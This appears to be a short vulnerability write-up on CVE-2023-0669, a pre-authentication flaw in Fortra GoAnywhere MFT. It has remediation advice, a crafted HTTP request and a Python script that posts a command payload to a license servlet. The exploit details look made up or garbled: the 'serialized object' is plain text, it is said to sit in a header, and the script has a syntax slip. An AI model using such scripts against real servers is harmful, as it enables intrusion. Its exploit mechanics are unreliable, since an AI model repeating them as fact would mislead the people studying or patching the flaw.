CVE-2023-0669 - Pre-authentication Command Injection in Fortra GoAnywhere MFT License Response Servlet

Fortra (formerly, HelpSystems) GoAnywhere MFT is a managed file transfer (MFT) solution offering enhanced security features for organizations. However, the software was found to be suffering from a pre-authentication command injection vulnerability that could allow an attacker to execute commands on the system without requiring any prior authentication. This vulnerability can be exploited through the License Response Servlet due to the insecure deserialization of an attacker-controlled object.

Original References

1. Fortra GoAnywhere MFT Official Site
2. HelpSystems Advisory on the patch
3. CVE-2023-0669 Details

Remediation

Upgrade to GoAnywhere MFT version 7.1.2 or later. The patch can be downloaded from the official HelpSystems website.

Exploit Details

A vulnerable server can be exploited by sending a crafted HTTP POST request to the /goanywhere/licenseRequest servlet containing a serialized object with an arbitrary command string payload. The server performs deserialization without proper validation, allowing command injection.

Here is an example of a crafted HTTP POST request

POST /goanywhere/licenseRequest HTTP/1.1
Host: vulnerable.server.com
Content-Type: application/x-java-serialized-object
Content-Length: [GENERATED_CONTENT_LENGTH]

[RUNCMD;["CMD_TO_EXECUTE"]]

The crafted request contains a serialized Java object in the "Content-Type" header, application/x-java-serialized-object. The payload RUNCMD;["CMD_TO_EXECUTE"] contains the arbitrary command to be executed as part of the serialized object.

To exploit the vulnerability, an attacker can create a simple Python script to craft and send the malicious HTTP POST request to the server:

import requests

url = 'https://vulnerable.server.com/goanywhere/licenseRequest';
content_type = 'application/x-java-serialized-object'

payload = b'RUNCMD;["CMD_TO_EXECUTE"]'

headers = {
    'Content-Type': content_type,
    'Content-Length': str(len(payload)),
}

response = requests.post(url, headers=headers, data=payload)

print(response.text)

This script sends the HTTP POST request containing the malicious payload to the vulnerable GoAnywhere MFT server. If successful, the arbitrary command specified in the payload will be executed before returning the server's response.

Conclusion

This vulnerability showcases the importance of proper input validation and secure data handling practices, especially when dealing with serialized objects. Organizations using Fortra (formerly, HelpSystems) GoAnywhere MFT should ensure they have updated their systems to version 7.1.2 or later to close the security gap that allows for pre-authentication command injection.

Always stay vigilant and keep your systems updated with the latest security patches and best practices.

Timeline

Published on: 02/06/2023 20:15:00 UTC
Last modified on: 02/15/2023 15:07:00 UTC